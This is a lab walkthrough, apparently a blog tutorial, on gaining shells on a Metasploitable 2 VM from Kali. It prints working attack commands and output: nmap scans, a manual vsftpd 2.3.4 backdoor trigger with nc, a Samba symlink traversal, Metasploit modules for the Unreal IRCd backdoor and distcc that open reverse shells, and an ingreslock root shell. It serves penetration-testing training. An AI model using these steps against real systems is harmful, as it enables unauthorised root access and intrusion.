Into
In this tutorial we will be hacking some of the more simple services on Metasploitable 2. The goal of each attack will be to gain access on the server either as root or with access that could be used to escalate into root.
Our lab is configured with the below machines.
- Kali Linux 2016.2 – 172.28.128.6
- Metasploitable 2 – 172.28.128.7
Port Scanning
To find what services are accessible on metasploitable2, we are going to use namp.
Nmap is a very powerful tool that has some amazing potential, I would Highly suggest learning about it’s abilities and getting comfortable using it. nmap cheat sheet here
The scan that we will be running today will return a list of open ports. This is done using the -p0-65535
option as seen below.
root@kali:~# nmap -p0-65535 172.28.128.7
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-01 22:25 EDT
Nmap scan report for 172.28.128.7
Host is up (0.0012s latency).
Not shown: 65506 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
6697/tcp open unknown
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open unknown
33779/tcp open unknown
39841/tcp open unknown
47948/tcp open unknown
52448/tcp open unknown
MAC Address: 08:00:27:0F:B6:3F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds
Ok, So now we have a list of open ports. Lets start having a look to see if we can use any of them to gain access.
FTP Service Port 21
So we are going to run nmap again, but this time we are going to target the FTP Service.
To complete this, we will run nmap -sV -p 21 172.28.128.7
-sV
will enumerate Service information-p 21
will limit the scan to port 21 (FTP)172.28.128.7
is our metasploitable2 target
root@kali:~# nmap -sV -p 21 172.28.128.7
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-01 22:42 EDT
Nmap scan report for 172.28.128.7
Host is up (0.0019s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
MAC Address: 08:00:27:0F:B6:3F (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.45 seconds
So as you can see above, nmap has detected that metasploitable2 is running vsFTPd 2.3.4.
In version 2.3.4 there is a backdoor, that can be activated by adding a smiley face 🙂
to the end of a username. Once activated, it will spawn a root shell on port 6200. Metasploit has an exploit to perform this attack, but we will perform this manually as it is easy to trigger.
First, we will connect to the telnet service and provide a special username. Notice that the username doesn’t have to be for a valid account.
root@kali:~# nc 172.28.128.7 21
220 (vsFTPd 2.3.4)
USER fake:)
331 Please specify the password.
PASS account
^C
Now that we have triggered the backdoor, we will connect to port 6200 and check our access.
root@kali:~# nc 172.28.128.7 6200
id
uid=0(root) gid=0(root)
whoami
root
So as you can see above, we have gained root access on the server by using the FTP backdoor.
SMB File System Access Port 445
Next we will work on exploiting file system access.
When Samba is configured with a writeable share and wide links, it can be used as a backdoor to access data that usually you wouldn’t have access to. Metasploit makes this flaw easy to exploit as it has a built in module to provide access to the root filesystem.
We will start by enumerating SMB Shares. To do this we will run smbclient -L //172.28.128.7
When we run the above command, it will ask for the password to root. As we don’t know this password, we will just hit enter forcing it to use Anonymous access.
root@kali:~# smbclient -L //172.28.128.7
WARNING: The "syslog" option is deprecated
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Server Comment
--------- -------
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)
Workgroup Master
--------- -------
WORKGROUP
Now we have the names of some shares, we will try using the metasploit auxiliary module – auxiliary/admin/smb/samba_symlink_traversal
to gain access. The share we will be going after is /tmp
.
root@kali:~# msfconsole
-- snip --
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 172.28.128.7
RHOST => 172.28.128.7
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf auxiliary(samba_symlink_traversal) > exploit
[*] 172.28.128.7:445 - Connecting to the server...
[*] 172.28.128.7:445 - Trying to mount writeable share 'tmp'...
[*] 172.28.128.7:445 - Trying to link 'rootfs' to the root filesystem...
[*] 172.28.128.7:445 - Now access the following share to browse the root filesystem:
[*] 172.28.128.7:445 - \\172.28.128.7\tmp\rootfs\
[*] Auxiliary module execution completed
msf auxiliary(samba_symlink_traversal) > exit
Ok, so we have used metasploit to create a SYMLINK in the share to gain access to the root file system.
Now lets try accessing the tmp
share and seeing if we can access the root file system.
root@kali:~# smbclient //172.28.128.7/tmp
WARNING: The "syslog" option is deprecated
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs
smb: \rootfs\> ls
. DR 0 Sun May 20 14:36:12 2012
.. DR 0 Sun May 20 14:36:12 2012
initrd DR 0 Tue Mar 16 18:57:40 2010
media DR 0 Tue Mar 16 18:55:52 2010
bin DR 0 Sun May 13 23:35:33 2012
lost+found DR 0 Tue Mar 16 18:55:15 2010
mnt DR 0 Wed Apr 28 16:16:56 2010
sbin DR 0 Sun May 13 21:54:53 2012
initrd.img R 7929183 Sun May 13 23:35:56 2012
home DR 0 Fri Apr 16 02:16:02 2010
lib DR 0 Sun May 13 23:35:22 2012
usr DR 0 Wed Apr 28 00:06:37 2010
proc DR 0 Thu Jun 1 22:54:59 2017
root DR 0 Thu Jun 1 23:24:33 2017
sys DR 0 Thu Jun 1 22:55:00 2017
boot DR 0 Sun May 13 23:36:28 2012
nohup.out R 10147 Thu Jun 1 23:24:33 2017
etc DR 0 Thu Jun 1 23:24:29 2017
dev DR 0 Thu Jun 1 22:55:14 2017
vmlinuz R 1987288 Thu Apr 10 12:55:41 2008
opt DR 0 Tue Mar 16 18:57:39 2010
var DR 0 Sun May 20 17:30:19 2012
cdrom DR 0 Tue Mar 16 18:55:51 2010
tmp D 0 Fri Jun 2 00:27:18 2017
srv DR 0 Tue Mar 16 18:57:38 2010
7282168 blocks of size 1024. 5427604 blocks available
smb: \rootfs\>
As you can see above, we have access to the root file system. From here we could download files and potentially upload files. This is not directly gaining root access, but could be used to identify generic ssh keys that may allow us to gain root access.
Unreal IRCd Port 6667
Next we are going to run another nmap scan on the port for IRC. To do this we will run nmap -sV 172.28.128.7 -p 6667
root@kali:~# nmap -sV 172.28.128.7 -p 6667
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-02 00:32 EDT
Nmap scan report for 172.28.128.7
Host is up (0.0024s latency).
PORT STATE SERVICE VERSION
6667/tcp open irc Unreal ircd
MAC Address: 08:00:27:0F:B6:3F (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.Metasploitable.LAN
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.51 seconds
So as you can above metaspoloitable is running Unreal ircd.
Unreal ircd 3.2.8.1 contained a backdoor in the archive between November 2009 and June 12th 2010, we will use a metasploit module to see if we can exploit this backdoor.
root@kali:~# msfconsole
--snip--
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 172.28.128.7
RHOST => 172.28.128.7
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 172.28.128.6:4444
[*] 172.28.128.7:6667 - Connected to 172.28.128.7:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 172.28.128.7:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NpX7wQfji4YPyYCu;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NpX7wQfji4YPyYCu\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.28.128.6:4444 -> 172.28.128.7:36515) at 2017-06-02 00:39:38 -0400
id
uid=0(root) gid=0(root)
whoami
root
So you can see above we have gained root access through the backdoor in Unreal ircd.
Distcc Test System Vulnerability Port 3632
Something we noticed in the original nmap scan was a service on 3632 that nmap detected as distcc, as you can see in the below code snip, metasploit contains an exploit for this service.
root@kali:~# msfconsole
--snip--
msf > search distcc
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > set RHOST 172.28.128.7
RHOST => 172.28.128.7
msf exploit(distcc_exec) > exploit
[*] Started reverse TCP double handler on 172.28.128.6:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zDMeZQtLVdMlifCP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "zDMeZQtLVdMlifCP\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.28.128.6:4444 -> 172.28.128.7:36978) at 2017-06-02 00:47:52 -0400
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
And there we have it. Another remote shell. This time we do not have root, but we still have access to continue and eventually escalate to root.
Ingreslock backdoor Port 1524
This is by far the most easiest backdoor to gain root access in metasploitable 2.
All you need to do is use netcat to connect to the port and you will have root. The command that we will run is nc 172.28.128.7 1524
.
root@kali:~# nc 172.28.128.7 1524
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/#
Summary
Metasploitable is a very good test bed if you are just getting into hacking, or if you would like to test your skills and see how much you can do by yourself before you do some research to find out if you missed anything.
At the end of the day, we have only uncovered a small number of flaws inside on Metasploitable2 and without a doubt will be doing more articles in the future covering other vulnerabilities inside this fantastic VM.